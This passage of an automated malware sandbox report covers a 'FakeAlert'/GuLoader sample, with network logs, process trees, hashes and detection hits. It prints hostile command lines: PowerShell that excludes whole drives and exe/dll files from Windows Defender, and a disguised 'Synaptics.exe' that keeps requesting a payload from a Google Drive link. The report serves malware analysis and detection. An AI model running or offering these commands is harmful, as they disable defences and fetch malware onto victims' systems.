                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC14INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 5f 45 58 6f 70 38 42 36 4c 41 38 48 2d 56 4a 66 66 4b 55 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u_EXop8B6LA8H-VJffKUSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC15INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 15 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                          6 | 192.168.2.3 | 49745 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 19 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 19 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC20INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 72 6f 77 6d 73 55 30 44 63 54 77 72 6e 42 77 4a 59 47 68 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rowmsU0DcTwrnBwJYGhWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC22INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 22 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                          7 | 192.168.2.3 | 49747 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 19 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 22 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC23INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC23INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 66 34 6c 6c 55 4d 31 5f 61 35 79 52 6e 76 63 7a 76 75 39 73 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="df4llUM1_a5yRnvczvu9sA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC25INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 25 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                          8 | 192.168.2.3 | 49749 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 22 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:20 UTC | 25 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49750 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:20 UTC | 25 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:21 UTC | 28 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked


                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:04:37:41
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:1490944 bytes
                                                                                                                                                                                                                          MD5 hash:C5BF732066AB84D1ABBA5B27638A5191
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:04:37:41
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                          Imagebase:0xc20000
                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0xc20000
                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                          Start time:04:37:42
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                          Imagebase:0x1010000
                                                                                                                                                                                                                          File size:430592 bytes
                                                                                                                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                          Start time:04:37:43
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          Imagebase:0x7ff7c9170000
                                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                          Start time:04:37:43
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:1270272 bytes
                                                                                                                                                                                                                          MD5 hash:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                          Start time:04:37:48
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\._cache_uniformerede.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:498497 bytes
                                                                                                                                                                                                                          MD5 hash:C4B2332489C0BA3E3F2A262F1C2C31B8
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                          Start time:04:37:50
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:771584 bytes
                                                                                                                                                                                                                          MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
